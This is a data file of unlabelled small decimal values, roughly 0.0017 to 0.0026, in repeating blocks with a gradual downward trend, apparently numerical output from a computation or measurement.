0.00173373
0.00173802
0.00173381
0.00173373
0.00173376
0.00173804
0.00173799
0.00173373
0.00173802
0.00173381
0.00173373
0.00172917
0.00172483
0.00172483
0.00172483
0.00172916
0.00172916
0.00172915
0.00173372
0.00172915
0.00173372
0.00171598
0.00171142
0.00171597
0.00171142
0.00171143
0.00170711
0.00170711
0.00171143
0.00171143
0.00170711
0.00171602
0.00172023
0.00172028
0.00171599
0.00172026
0.00171599
0.00171606
0.00171602
0.00172023
0.00172028
0.00171598
0.00172026
0.00171598
0.00171606
0.00171597
0.00172029
0.00172029
0.0017203
0.00171597
0.00171597
0.0017114
0.00170713
0.00171142
0.0017072
0.00171142
0.00170716
0.00171137
0.00171139
0.00170712
0.00171142
0.0017072
0.00171141
0.00170716
0.00171137
0.00169371
0.00169826
0.00169371
0.00169826
0.00169825
0.00170257
0.00170257
0.00170258
0.00169826
0.00169826
0.00169369
0.0016895
0.00169372
0.00168943
0.00169371
0.00169367
0.00168946
0.00169369
0.0016895
0.00169371
0.00168943
0.00169371
0.00169366
0.00168946
0.0016983
0.00170256
0.00170251
0.00169827
0.00170254
0.00169827
0.00169834
0.0016983
0.00170256
0.00170251
0.00169827
0.00170254
0.00169827
0.00169835
0.00169373
0.00168941
0.00168941
0.00169372
0.00169372
0.00168941
0.00171142
0.0017114
0.00170711
0.00170712
0.00171142
0.0017114
0.0017071
0.00171597
0.00172029
0.00171597
0.00172029
0.00171597
0.00171597
0.00171599
0.00172028
0.00172027
0.00171597
0.00172029
0.00171598
0.00171142
0.0017071
0.0017114
0.00171142
0.0017071
0.00169825
0.00170256
0.00170255
0.00169827
0.00170256
0.00169825
0.00169827
0.00169372
0.00169371
0.00168941
0.00168941
0.00169372
0.00169825
0.00170256
0.00169826
0.00170256
0.00169826
0.00169372
0.0016937
0.00168941
0.00168943
0.00168941
0.00169371
0.0016937
0.00169825
0.00170256
0.00170254
0.00169827
0.00170256
0.00169825
0.00169827
0.00169371
0.0016937
0.00168941
0.00169371
0.00168941
0.00169825
0.00170256
0.00169826
0.00170256
0.00169825
0.00169371
0.0016937
0.00168941
0.00168943
0.00169371
0.0016937
0.00168941
0.00171142
0.0017071
0.0017071
0.00171142
0.00171142
0.0017071
0.00171601
0.00172023
0.00172027
0.00171598
0.00171598
0.00172025
0.00171606
0.00171601
0.00172023
0.00172027
0.00171597
0.00171605
0.00172025
0.00171598
0.00171596
0.00172029
0.00172029
0.00171596
0.00172029
0.00171596
0.00171139
0.00170712
0.00171141
0.00170719
0.00171141
0.00171136
0.00170715
0.00171138
0.00170711
0.00171141
0.00170719
0.00171136
0.00171141
0.00170715
0.00171597
0.00171141
0.00169371
0.00169825
0.00169825
0.00170256
0.00170256
0.00170257
0.00169825
0.00169825
0.00169368
0.00168949
0.00169371
0.00168942
0.00169366
0.0016937
0.00168945
0.00169368
0.0016895
0.00169371
0.00168942
0.0016937
0.00169366
0.00168945
0.0016983
0.00170255
0.0017025
0.00169826
0.00169834
0.00170253
0.00169826
0.0016983
0.00170255
0.0017025
0.00169826
0.00170253
0.00169826
0.00169834
0.00169372
0.00168941
0.00168941
0.00169372
0.00169372
0.0016894
0.00169371
0.00169825
0.00171142
0.00171141
0.00170711
0.00170713
0.00171142
0.00171141
0.00170711
0.00171597
0.00172029
0.00171598
0.00172029
0.00171598
0.00171597
0.001716
0.00172029
0.00172028
0.00171597
0.00172029
0.00171599
0.00171143
0.00170711
0.00171141
0.00171143
0.00170711
0.00169826
0.00170255
0.00170257
0.00169828
0.00170257
0.00169827
0.00169826
0.00169372
0.00169371
0.00168942
0.00168942
0.00169372
0.00169826
0.00170257
0.00169827
0.00170257
0.00169826
0.00169372
0.00169371
0.00168943
0.00168942
0.00168942
0.00169371
0.00169372
0.00169826
0.00170257
0.00170255
0.00169828
0.00170257
0.00169826
0.00169828
0.00169372
0.00169371
0.00168942
0.00169372
0.00168942
0.00169826
0.00170257
0.00169827
0.00170257
0.00169826
0.00169372
0.00169371
0.00168942
0.00168944
0.00169372
0.00169371
0.00168942
0.00171142
0.0017114
0.00170712
0.0017071
0.0017114
0.00171141
0.0017071
0.00171597
0.00172029
0.00171597
0.00171597
0.00172029
0.00171596
0.00171599
0.00172027
0.00172028
0.00171598
0.00172028
0.00171597
0.00171142
0.00170711
0.00171141
0.00171142
0.0017071
0.00171142
0.0017114
0.0017071
0.00170712
0.00171141
0.00171141
0.0017071
0.00171596
0.00172028
0.00171597
0.00172028
0.00171597
0.00171596
0.00171599
0.00172028
0.00172027
0.00172028
0.00171597
0.00171598
0.00171142
0.00170711
0.00171141
0.00171142
0.0017071
0.00169825
0.00170254
0.00170256
0.00169828
0.00170256
0.00169827
0.00169825
0.00169371
0.0016937
0.00168941
0.00169371
0.00168941
0.00169825
0.00170256
0.00169826
0.00170256
0.00169825
0.00169371
0.0016937
0.00168943
0.00168941
0.0016937
0.00169371
0.00168941
0.00169825
0.00170256
0.00170255
0.00169828
0.00170256
0.00169825
0.00169827
0.00169372
0.00169371
0.00168941
0.00169372
0.00168941
0.00169825
0.00170256
0.00169826
0.00170256
0.00169825
0.00169372
0.0016937
0.00168941
0.00168943
0.00169371
0.0016937
0.00168941
0.00171143
0.00170711
0.00170711
0.00171143
0.00171143
0.00170711
0.00171602
0.00172024
0.00172028
0.00171598
0.00171598
0.00172026
0.00171606
0.00171602
0.00172023
0.00172028
0.00171598
0.00171606
0.00172026
0.00171598
0.00171597
0.00172029
0.00172029
0.00171597
0.0017203
0.00171597
0.0017114
0.00170712
0.00171142
0.0017072
0.00171142
0.00171137
0.00170716
0.00171139
0.00170712
0.00171142
0.0017072
0.00171137
0.00171141
0.00170716
0.00171597
0.00171142
0.00169372
0.00169826
0.00169825
0.00170257
0.00170257
0.00170258
0.00169826
0.00169826
0.00169369
0.0016895
0.00169372
0.00168943
0.00169367
0.00169371
0.00168946
0.00169369
0.00168951
0.00169372
0.00168943
0.00169371
0.00169367
0.00168946
0.00169831
0.00170256
0.00170251
0.00169827
0.00169835
0.00170254
0.00169827
0.0016983
0.00170256
0.00170251
0.00169827
0.00170254
0.00169827
0.00169835
0.00169373
0.00168941
0.00168941
0.00169373
0.00169373
0.00168941
0.00169372
0.00169826
0.00171142
0.0017114
0.00170712
0.00170711
0.0017114
0.00171141
0.00170711
0.00171597
0.00172029
0.00171598
0.00171597
0.00172029
0.00171596
0.00171599
0.00172027
0.00172028
0.00171598
0.00172028
0.00171597
0.00171142
0.00170711
0.00171141
0.00171142
0.00170711
0.00171142
0.0017114
0.00170712
0.00170711
0.0017114
0.00171141
0.0017071
0.00171596
0.00172028
0.00171597
0.00172028
0.00171596
0.00171596
0.00171599
0.00172027
0.00172028
0.00172028
0.00171598
0.00171597
0.00171142
0.00170711
0.00171141
0.00171142
0.0017071
0.00169826
0.00170255
0.00170256
0.00169828
0.00170256
0.00169828
0.00169826
0.00169372
0.00169371
0.00168942
0.00169372
0.00168942
0.00169826
0.00170257
0.00169827
0.00170257
0.00169826
0.00169372
0.00169371
0.00168944
0.00168942
0.00169371
0.00169372
0.00168942
0.00169825
0.00170255
0.00170256
0.00169828
0.00170256
0.00169827
0.00169826
0.00169372
0.00169371
0.00168942
0.00169372
0.00168942
0.00169825
0.00170256
0.00169826
0.00170256
0.00169826
0.00169372
0.00169371
0.00168943
0.00168942
0.00169371
0.00169372
0.00168942
0.00171597
0.00171141
0.00171597
0.00171141
0.00169825
0.00170257
0.00170257
0.00170257
0.00169825
0.00169825
0.00169369
0.0016895
0.00169371
0.00168942
0.00168946
0.00169366
0.00169371
0.00169369
0.0016895
0.00169371
0.00168942
0.00168946
0.00169366
0.00169371
0.0016983
0.00170255
0.00170251
0.00169827
0.00170253
0.00169834
0.00169827
0.0016983
0.00170255
0.00170251
0.00169827
0.00170253
0.00169834
0.00169827
0.00169372
0.00168941
0.00168941
0.00168941
0.00169372
0.00169372
0.00169371
0.00169826
0.00169371
0.00169826
0.00168058
0.00167605
0.00168058
0.00167605
0.00167606
0.00167175
0.00167175
0.00167605
0.00167605
0.00167175
0.00168062
0.00168482
0.00168487
0.00168059
0.00168485
0.00168059
0.00168066
0.00168062
0.00168483
0.00168487
0.00168059
0.00168485
0.00168059
0.00168067
0.00168057
0.00168488
0.00168488
0.00168489
0.00168058
0.00168058
0.00167602
0.00167177
0.00167605
0.00167184
0.00167604
0.00167179
0.001676
0.00167602
0.00167177
0.00167605
0.00167184
0.00167604
0.0016718
0.00167599
0.00166294
0.00166295
0.00166293
0.00166723
0.00166724
0.00166724
0.00166294
0.00166294
0.00166298
0.00166722
0.00166717
0.00166295
0.0016672
0.00166295
0.00166302
0.00166299
0.00166722
0.00166717
0.00166295
0.0016672
0.00166295
0.00166303
0.00167605
0.00167604
0.00167175
0.00167177
0.00167605
0.00167604
0.00167175
0.00168058
0.00168488
0.00168059
0.00168488
0.00168058
0.00168058
0.0016806
0.00168488
0.00168486
0.00168058
0.00168488
0.00168059
0.00167605
0.00167175
0.00167604
0.00167605
0.00167175
0.00166294
0.00166723
0.00166294
0.00166723
0.00166294
0.00167606
0.00167175
0.00167175
0.00167605
0.00167605
0.00167175
0.00168062
0.00168482
0.00168487
0.00168059
0.00168059
0.00168485
0.00168066
0.00168062
0.00168482
0.00168487
0.00168059
0.00168066
0.00168484
0.00168059
0.00168057
0.00168488
0.00168488
0.00168057
0.00168488
0.00168057
0.00167602
0.00167177
0.00167604
0.00167184
0.00167604
0.001676
0.0016718
0.00167602
0.00167176
0.00167604
0.00167184
0.00167599
0.00167604
0.0016718
0.00168058
0.00167604
0.00167605
0.00167604
0.00167176
0.00167178
0.00167605
0.00167604
0.00167176
0.00168058
0.00168488
0.00168059
0.00168489
0.00168059
0.00168058
0.00168061
0.00168488
0.00168487
0.00168059
0.00168488
0.0016806
0.00167606
0.00167176
0.00167605
0.00167606
0.00167176
0.00166294
0.00166722
0.00166723
0.00166297
0.00166723
0.00166296
0.00166294
0.00166294
0.00166724
0.00166295
0.00166724
0.00166294
0.00166294
0.00166723
0.00166722
0.00166297
0.00166723
0.00166294
0.00166296
0.00166294
0.00166723
0.00166295
0.00166723
0.00166294
0.00167605
0.00167603
0.00167177
0.00167176
0.00167604
0.00167605
0.00167175
0.00168058
0.00168488
0.00168058
0.00168058
0.00168488
0.00168057
0.0016806
0.00168486
0.00168487
0.00168059
0.00168487
0.00168058
0.00167605
0.00167175
0.00167604
0.00167605
0.00167175
0.00167605
0.00167603
0.00167175
0.00167177
0.00167605
0.00167604
0.00167175
0.00168058
0.00168488
0.00168059
0.00168488
0.00168058
0.00168058
0.0016806
0.00168487
0.00168486
0.00168488
0.00168058
0.00168059
0.00167605
0.00167175
0.00167604
0.00167605
0.00167175
0.00167606
0.00167176
0.00167176
0.00167606
0.00167606
0.00167175
0.00168063
0.00168483
0.00168487
0.0016806
0.0016806
0.00168485
0.00168067
0.00168063
0.00168483
0.00168488
0.0016806
0.00168067
0.00168485
0.0016806
0.00168058
0.00168489
0.00168489
0.00168058
0.00168489
0.00168058
0.00167603
0.00167177
0.00167605
0.00167184
0.00167605
0.001676
0.0016718
0.00167603
0.00167177
0.00167605
0.00167184
0.001676
0.00167605
0.0016718
0.00168059
0.00167605
0.00166294
0.00166294
0.00166724
0.00166724
0.00166724
0.00166294
0.00166294
0.00166299
0.00166723
0.00166717
0.00166295
0.00166303
0.0016672
0.00166295
0.00166298
0.00166722
0.00166717
0.00166295
0.0016672
0.00166295
0.00166303
0.00166294
0.00167606
0.00167604
0.00167178
0.00167176
0.00167604
0.00167605
0.00167176
0.00168059
0.00168488
0.00168059
0.00168059
0.00168489
0.00168059
0.00168061
0.00168487
0.00168488
0.0016806
0.00168488
0.00168059
0.00167606
0.00167176
0.00167604
0.00167606
0.00167176
0.00167605
0.00167604
0.00167177
0.00167176
0.00167604
0.00167605
0.00167176
0.00168058
0.00168488
0.00168059
0.00168488
0.00168058
0.00168058
0.00168061
0.00168487
0.00168488
0.00168488
0.0016806
0.00168059
0.00167605
0.00167176
0.00167604
0.00167605
0.00167176
0.00166724
0.00166295
0.00166724
0.00168058
0.00167604
0.00168059
0.00167605
0.00258281
0.00258281
0.00257293
0.00257293
0.00257293
0.00257293
0.00258281
0.00258063
0.0025848
0.0025848
0.00258104
0.00258075
0.00258075
0.00258489
0.00254336
0.00254336
0.00253354
0.00253354
0.00253354
0.00253353
0.00254336
0.00254118
0.00254533
0.00254533
0.00254161
0.00254542
0.00254131
0.00254131
0.00250414
0.00250414
0.00249437
0.00249437
0.00249437
0.00249436
0.00250414
0.00250195
0.00250609
0.00250609
0.0025024
0.00250618
0.00250209
0.00250209
0.00246513
0.00246513
0.00245542
0.00245541
0.00245541
0.00245541
0.00246513
0.00246293
0.00246707
0.00246707
0.0024634
0.00246715
0.00246309
0.00246309
0.00242633
0.00242633
0.00241667
0.00241666
0.00241666
0.00241665
0.00242632
0.00242412
0.00242825
0.00242825
0.00242461
0.00242834
0.00242429
0.00242429
0.00238773
0.00238773
0.00237811
0.00237811
0.00237811
0.0023781
0.00238772
0.00238551
0.00238962
0.00238962
0.00238601
0.00238972
0.00238569
0.00238569
0.00234931
0.00234931
0.00233974
0.00233974
0.00233974
0.00233973
0.0023493
0.00234709
0.00235119
0.00235119
0.0023476
0.00235129
0.00234727
0.00234727
0.00231108
0.00231108
0.00230156
0.00230155
0.00230155
0.00230154
0.00231107
0.00230886
0.00231295
0.00231295
0.00230937
0.00231305
0.00230904
0.00230904
0.00227302
0.00227302
0.00226354
0.00226353
0.00226353
0.00226352
0.00227301
0.00227079
0.00227487
0.00227487
0.00227131
0.00227498
0.00227098
0.00227098
0.00223512
0.00223512
0.00222567
0.00222566
0.00222566
0.00222565
0.0022351
0.00223289
0.00223695
0.00223695
0.0022334
0.00223706
0.00223308
0.00223307
0.00219735
0.00219735
0.00218794
0.00218793
0.00218793
0.00218792
0.00219734
0.00219513
0.00219918
0.00219918
0.00219564
0.00219929
0.00219531
0.00219531
0.00215971
0.00215971
0.00215032
0.00215031
0.00215031
0.0021503
0.00215969
0.00215748
0.00216153
0.00216153
0.002158
0.00216165
0.00215767
0.00215767
0.00212217
0.00212217
0.0021128
0.0021128
0.0021128
0.00211278
0.00212215
0.00211994
0.00212398
0.00212398
0.00212045
0.0021241
0.00212013
0.00212013
0.00208471
0.00208471
0.00207536
0.00207536
0.00207536
0.00207534
0.00208469
0.00208248
0.00208652
0.00208652
0.00208299
0.00208664
0.00208267
0.00208267
0.00204732
0.00204732
0.00203799
0.00203799
0.00203799
0.00203797
0.00204731
0.0020451
0.00204913
0.00204913
0.0020456
0.00204926
0.00204528
0.00204528
0.00201001
0.00201001
0.0020007
0.0020007
0.0020007
0.00200069
0.00201
0.00200779
0.00201181
0.00201181
0.00200829
0.00201194
0.00200797
0.00200797
0.00197279
0.00197279
0.00196351
0.00196351
0.00196351
0.0019635
0.00197278
0.00197057
0.00197459
0.00197459
0.00197107
0.00197472
0.00197075
0.00197075
0.0019357
0.0019357
0.00192646
0.00192645
0.00192645
0.00192645
0.00193569
0.00193349
0.00193749
0.00193749
0.00193398
0.00193762
0.00193367
0.00193367
0.00189879
0.00189879
0.00188959
0.0018896
0.0018896
0.00188959
0.00189878
0.00189658
0.00190057
0.00190057
0.00189707
0.0019007
0.00189676
0.00189676
0.00186212
0.00186212
0.00185299
0.001853
0.00185299
0.00185299
0.00186212
0.00185993
0.00186388
0.00186389
0.00186041
0.00186402
0.00186011
0.00186011
0.00182574
0.00182574
0.00181668
0.00181669
0.00181669
0.00181669
0.00182574
0.00182357
0.00182749
0.00182749
0.00182404
0.00182763
0.00182374
0.00182374
0.00178965
0.00178965
0.00178067
0.00178068
0.00178068
0.00178067
0.00178965
0.00178751
0.0017914
0.0017914
0.00178797
0.00179154
0.00178768
0.00178768
0.00175384
0.00175384
0.00174492
0.00174493
0.00174493
0.00174492
0.00175384
0.00175172
0.00175559
0.00175559
0.00175217
0.00175573
0.00175189
0.00175189
0.00171826
0.00171826
0.00170939
0.00170939
0.00170939
0.00170939
0.00171825
0.00171615
0.00172
0.00172
0.0017166
0.00172014
0.00171633
0.00171633
0.00168284
0.00168284
0.00167401
0.00167401
0.00167401
0.001674
0.00168284
0.00168077
0.0016846
0.0016846
0.00168121
0.00168474
0.00168094
0.00168094
0.00258062
0.00258481
0.00258479
0.00258103
0.00258076
0.00258074
0.00258489
0.00255527
0.00255505
0.00255115
0.00255115
0.00255518
0.00255518
0.00255102
0.00258063
0.0025848
0.0025848
0.00258104
0.00258075
0.00258075
0.00258489
0.00255527
0.00255505
0.00255115
0.00255115
0.00255518
0.00255518
0.00255102
0.00258063
0.0025848
0.0025848
0.00258104
0.00258075
0.00258075
0.00258489
0.00255527
0.00255505
0.00255115
0.00255115
0.00255518
0.00255518
0.00255102
0.00255527
0.00255505
0.00255115
0.00255114
0.00255102
0.00255518
0.00255518
0.00254118
0.00254533
0.00254533
0.00254161
0.00254542
0.00254131
0.00254131
0.00251597
0.00251576
0.00251188
0.00251188
0.00251588
0.00251588
0.00251174
0.00254118
0.00254533
0.00254533
0.00254161
0.00254131
0.00254542
0.00254131
0.00251597
0.00251576
0.00251188
0.00251188
0.00251588
0.00251588
0.00251173
0.00254118
0.00254533
0.00254533
0.00254161
0.00254131
0.00254542
0.00254131
0.00251597
0.00251576
0.00251188
0.00251187
0.00251588
0.00251588
0.00251174
0.00251597
0.00251576
0.00251188
0.00251188
0.00251173
0.00251588
0.00251588
0.00250195
0.00250609
0.00250609
0.0025024
0.00250618
0.0025021
0.00250209
0.00247689
0.00247668
0.00247283
0.00247282
0.0024768
0.0024768
0.00247266
0.00250195
0.00250609
0.00250609
0.0025024
0.0025021
0.00250618
0.0025021
0.00247689
0.00247668
0.00247282
0.00247282
0.0024768
0.0024768
0.00247266
0.00250195
0.00250609
0.00250609
0.0025024
0.00250209
0.00250618
0.0025021
0.00247689
0.00247668
0.00247282
0.00247282
0.0024768
0.0024768
0.00247266
0.00247689
0.00247668
0.00247282
0.00247282
0.00247266
0.0024768
0.0024768
0.00246293
0.00246707
0.00246707
0.0024634
0.00246715
0.00246309
0.00246309
0.00243802
0.00243781
0.00243398
0.00243397
0.00243793
0.00243793
0.00243381
0.00246293
0.00246707
0.00246707
0.0024634
0.00246309
0.00246715
0.00246309
0.00243802
0.00243781
0.00243397
0.00243397
0.00243793
0.00243793
0.0024338
0.00246293
0.00246707
0.00246707
0.0024634
0.00246309
0.00246715
0.00246309
0.00243802
0.00243781
0.00243398
0.00243397
0.00243793
0.00243793
0.0024338
0.00243802
0.00243781
0.00243397
0.00243397
0.0024338
0.00243793
0.00243793
0.00242412
0.00242825
0.00242825
0.00242461
0.00242834
0.00242429
0.00242429
0.00239935
0.00239914
0.00239533
0.00239532
0.00239926
0.00239926
0.00239515
0.00242412
0.00242825
0.00242825
0.00242461
0.00242429
0.00242834
0.00242429
0.00239936
0.00239914
0.00239532
0.00239532
0.00239926
0.00239926
0.00239515
0.00242412
0.00242825
0.00242825
0.00242461
0.00242429
0.00242834
0.0024243
0.00239935
0.00239914
0.00239532
0.00239532
0.00239926
0.00239926
0.00239515
0.00239936
0.00239914
0.00239532
0.00239532
0.00239515
0.00239926
0.00239926
0.00238551
0.00238962
0.00238962
0.00238601
0.00238972
0.00238569
0.00238569
0.00236088
0.00236066
0.00235686
0.00235686
0.00236078
0.00236078
0.00235668
0.00238551
0.00238962
0.00238962
0.00238601
0.00238569
0.00238972
0.00238569
0.00236088
0.00236066
0.00235686
0.00235686
0.00236078
0.00236078
0.00235668
0.00238551
0.00238962
0.00238962
0.00238601
0.00238569
0.00238972
0.00238569
0.00236088
0.00236066
0.00235686
0.00235686
0.00236078
0.00236078
0.00235668
0.00236088
0.00236066
0.00235686
0.00235686
0.00235668
0.00236078
0.00236078
0.00234709
0.00235119
0.00235119
0.0023476
0.00235129
0.00234728
0.00234727
0.00232259
0.00232237
0.00231859
0.00231858
0.00232249
0.00232249
0.0023184
0.00234709
0.00235119
0.00235119
0.0023476
0.00234727
0.00235129
0.00234727
0.00232259
0.00232237
0.00231859
0.00231858
0.00232249
0.00232249
0.0023184
0.00234709
0.00235119
0.00235119
0.0023476
0.00234727
0.00235129
0.00234727
0.00232259
0.00232237
0.00231858
0.00231858
0.00232249
0.00232249
0.0023184
0.00232259
0.00232237
0.00231858
0.00231858
0.0023184
0.00232249
0.00232249
0.00230886
0.00231295
0.00231295
0.00230937
0.00231305
0.00230904
0.00230904
0.00228448
0.00228425
0.00228048
0.00228048
0.00228437
0.00228438
0.00228029
0.00230886
0.00231295
0.00231295
0.00230937
0.00230904
0.00231305
0.00230904
0.00228448
0.00228425
0.00228048
0.00228048
0.00228437
0.00228437
0.00228029
0.00230886
0.00231295
0.00231295
0.00230937
0.00230904
0.00231305
0.00230904
0.00228448
0.00228425
0.00228048
0.00228048
0.00228437
0.00228438
0.0022803
0.00228448
0.00228425
0.00228048
0.00228048
0.00228029
0.00228437
0.00228437
0.00227079
0.00227487
0.00227487
0.00227131
0.00227497
0.00227098
0.00227098
0.00224653
0.00224629
0.00224254
0.00224254
0.00224642
0.00224642
0.00224235
0.00227079
0.00227487
0.00227487
0.00227131
0.00227098
0.00227497
0.00227098
0.00224653
0.00224629
0.00224254
0.00224254
0.00224642
0.00224642
0.00224235
0.00227079
0.00227487
0.00227487
0.00227131
0.00227098
0.00227498
0.00227098
0.00224653
0.00224629
0.00224254
0.00224254
0.00224642
0.00224642
0.00224235
0.00224653
0.00224629
0.00224254
0.00224254
0.00224235
0.00224642
0.00224642
0.00223289
0.00223696
0.00223696
0.00223341
0.00223706
0.00223308
0.00223308
0.00220872
0.00220847
0.00220474
0.00220474
0.00220861
0.00220861
0.00220455
0.00223289
0.00223695
0.00223695
0.00223341
0.00223308
0.00223706
0.00223308
0.00220872
0.00220847
0.00220474
0.00220474
0.00220861
0.00220861
0.00220455
0.00223289
0.00223695
0.00223696
0.00223341
0.00223308
0.00223706
0.00223308
0.00220872
0.00220847
0.00220474
0.00220474
0.00220861
0.00220861
0.00220455
0.00220872
0.00220847
0.00220474
0.00220474
0.00220455
0.00220861
0.00220861
0.00219513
0.00219918
0.00219918
0.00219564
0.00219929
0.00219532
0.00219531
0.00217105
0.00217079
0.00216707
0.00216707
0.00217093
0.00217093
0.00216688
0.00219513
0.00219918
0.00219918
0.00219564
0.00219531
0.00219929
0.00219531
0.00217105
0.00217079
0.00216707
0.00216707
0.00217093
0.00217093
0.00216688
0.00219513
0.00219918
0.00219918
0.00219564
0.00219531
0.00219929
0.00219531
0.00217105
0.00217079
0.00216707
0.00216707
0.00217094
0.00217094
0.00216688
0.00217105
0.00217079
0.00216707
0.00216707
0.00216688
0.00217093
0.00217093
0.00215748
0.00216153
0.00216153
0.002158
0.00216165
0.00215767
0.00215767
0.00213348
0.00213321
0.00212951
0.0021295
0.00213336
0.00213336
0.00212932
0.00215748
0.00216153
0.00216153
0.002158
0.00215767
0.00216165
0.00215767
0.00213348
0.00213321
0.00212951
0.00212951
0.00213336
0.00213336
0.00212932
0.00215748
0.00216153
0.00216153
0.002158
0.00215767
0.00216165
0.00215767
0.00213348
0.00213321
0.00212951
0.00212951
0.00213336
0.00213336
0.00212932
0.00213348
0.00213321
0.00212951
0.0021295
0.00212932
0.00213336
0.00213336
0.00211994
0.00212398
0.00212398
0.00212045
0.0021241
0.00212013
0.00212013
0.002096
0.00209572
0.00209203
0.00209203
0.00209588
0.00209588
0.00209184
0.00211994
0.00212398
0.00212398
0.00212046
0.00212013
0.0021241
0.00212013
0.002096
0.00209572
0.00209203
0.00209203
0.00209588
0.00209588
0.00209184
0.00211994
0.00212398
0.00212398
0.00212045
0.00212013
0.0021241
0.00212013
0.002096
0.00209572
0.00209203
0.00209203
0.00209588
0.00209588
0.00209184
0.002096
0.00209572
0.00209203
0.00209203
0.00209184
0.00209588
0.00209588
0.00208248
0.00208652
0.00208652
0.00208299
0.00208664
0.00208267
0.00208267
0.0020586
0.00205831
0.00205462
0.00205462
0.00205847
0.00205847
0.00205444
0.00208248
0.00208652
0.00208652
0.00208299
0.00208267
0.00208664
0.00208267
0.0020586
0.00205831
0.00205462
0.00205462
0.00205847
0.00205847
0.00205444
0.00208248
0.00208652
0.00208652
0.00208299
0.00208267
0.00208664
0.00208267
0.0020586
0.00205831
0.00205462
0.00205462
0.00205847
0.00205847
0.00205444
0.0020586
0.00205831
0.00205462
0.00205462
0.00205444
0.00205847
0.00205847
0.0020451
0.00204913
0.00204913
0.0020456
0.00204926
0.00204528
0.00204528
0.00202127
0.00202097
0.00201729
0.00201729
0.00202114
0.00202114
0.00201711
0.0020451
0.00204913
0.00204913
0.0020456
0.00204528
0.00204926
0.00204528
0.00202126
0.00202097
0.00201729
0.00201729
0.00202114
0.00202114
0.00201711
0.0020451
0.00204913
0.00204913
0.0020456
0.00204528
0.00204926
0.00204528
0.00202127
0.00202097
0.00201729
0.00201729
0.00202114
0.00202114
0.00201711
0.00202126
0.00202097
0.00201729
0.00201729
0.00201711
0.00202113
0.00202113
0.00200779
0.00201181
0.00201181
0.00200829
0.00201194
0.00200797
0.00200797
0.00198402
0.00198371
0.00198005
0.00198005
0.00198389
0.00198389
0.00197987
0.00200779
0.00201181
0.00201181
0.00200829
0.00200797
0.00201194
0.00200797
0.00198402
0.00198371
0.00198005
0.00198005
0.00198389
0.00198389
0.00197987
0.00200779
0.00201181
0.00201181
0.00200829
0.00200797
0.00201194
0.00200797
0.00198402
0.00198371
0.00198005
0.00198005
0.00198389
0.00198389
0.00197987
0.00198402
0.00198371
0.00198005
0.00198005
0.00197987
0.00198389
0.00198389
0.00197058
0.00197459
0.00197459
0.00197107
0.00197472
0.00197076
0.00197075
0.00194689
0.00194657
0.00194292
0.00194292
0.00194675
0.00194675
0.00194274
0.00197057
0.00197459
0.00197459
0.00197107
0.00197075
0.00197472
0.00197076
0.00194689
0.00194657
0.00194293
0.00194292
0.00194675
0.00194675
0.00194274
0.00197058
0.00197459
0.00197459
0.00197107
0.00197075
0.00197472
0.00197076
0.00194689
0.00194657
0.00194292
0.00194292
0.00194675
0.00194675
0.00194274
0.00194689
0.00194657
0.00194292
0.00194292
0.00194274
0.00194675
0.00194675
0.00193349
0.00193749
0.00193749
0.00193398
0.00193762
0.00193367
0.00193367
0.00190991
0.00190959
0.00190597
0.00190596
0.00190978
0.00190978
0.00190579
0.00193349
0.00193749
0.00193749
0.00193398
0.00193367
0.00193763
0.00193367
0.00190991
0.00190959
0.00190597
0.00190597
0.00190978
0.00190978
0.00190579
0.00193349
0.00193749
0.00193749
0.00193398
0.00193367
0.00193762
0.00193367
0.00190991
0.00190959
0.00190597
0.00190597
0.00190977
0.00190978
0.00190579
0.00190992
0.00190959
0.00190597
0.00190597
0.00190579
0.00190978
0.00190978
0.00189658
0.00190056
0.00190056
0.00189707
0.0019007
0.00189676
0.00189676
0.00187316
0.00187283
0.00186924
0.00186924
0.00187302
0.00187302
0.00186906
0.00189658
0.00190056
0.00190056
0.00189707
0.00189676
0.0019007
0.00189676
0.00187317
0.00187283
0.00186924
0.00186924
0.00187303
0.00187303
0.00186907
0.00189658
0.00190056
0.00190056
0.00189707
0.00189676
0.0019007
0.00189676
0.00187316
0.00187283
0.00186924
0.00186924
0.00187302
0.00187303
0.00186906
0.00187317
0.00187284
0.00186925
0.00186925
0.00186907
0.00187303
0.00187303
0.00185992
0.00186388
0.00186388
0.0018604
0.00186401
0.0018601
0.0018601
0.00183669
0.00183636
0.0018328
0.0018328
0.00183655
0.00183656
0.00183262
0.00185993
0.00186388
0.00186388
0.00186041
0.0018601
0.00186402
0.00186011
0.0018367
0.00183636
0.0018328
0.0018328
0.00183656
0.00183656
0.00183263
0.00185992
0.00186388
0.00186388
0.0018604
0.0018601
0.00186402
0.0018601
0.00183669
0.00183636
0.0018328
0.0018328
0.00183656
0.00183656
0.00183262
0.0018367
0.00183637
0.00183281
0.00183281
0.00183263
0.00183656
0.00183656
0.00182356
0.00182748
0.00182748
0.00182403
0.00182762
0.00182374
0.00182374
0.00180054
0.00180019
0.00179667
0.00179667
0.0018004
0.0018004
0.0017965
0.00182357
0.00182749
0.00182749
0.00182404
0.00182374
0.00182763
0.00182374
0.00180054
0.00180019
0.00179667
0.00179667
0.0018004
0.0018004
0.0017965
0.00182356
0.00182748
0.00182748
0.00182403
0.00182374
0.00182762
0.00182374
0.00180053
0.00180019
0.00179667
0.00179667
0.00180039
0.00180039
0.00179649
0.00180053
0.00180019
0.00179667
0.00179667
0.00179649
0.00180039
0.00180039
0.00178751
0.0017914
0.0017914
0.00178797
0.00179154
0.00178769
0.00178768
0.00176466
0.00176431
0.00176082
0.00176082
0.00176452
0.00176452
0.00176065
0.00178751
0.0017914
0.0017914
0.00178797
0.00178768
0.00179154
0.00178768
0.00176466
0.0017643
0.00176082
0.00176082
0.00176452
0.00176452
0.00176065
0.00178751
0.0017914
0.0017914
0.00178797
0.00178768
0.00179154
0.00178768
0.00176466
0.00176431
0.00176082
0.00176082
0.00176452
0.00176452
0.00176065
0.00176466
0.00176431
0.00176082
0.00176082
0.00176064
0.00176452
0.00176452
0.00175172
0.00175559
0.00175559
0.00175218
0.00175573
0.0017519
0.0017519
0.00172903
0.00172867
0.00172521
0.00172521
0.00172889
0.00172889
0.00172503
0.00175172
0.00175559
0.00175559
0.00175217
0.00175189
0.00175573
0.0017519
0.00172902
0.00172866
0.0017252
0.0017252
0.00172888
0.00172888
0.00172503
0.00175173
0.00175559
0.00175559
0.00175218
0.0017519
0.00175573
0.0017519
0.00172903
0.00172867
0.00172521
0.00172521
0.00172889
0.00172889
0.00172503
0.00172902
0.00172867
0.0017252
0.0017252
0.00172503
0.00172888
0.00172888
0.00171616
0.00172
0.00172
0.0017166
0.00172015
0.00171633
0.00171633
0.00169358
0.00169322
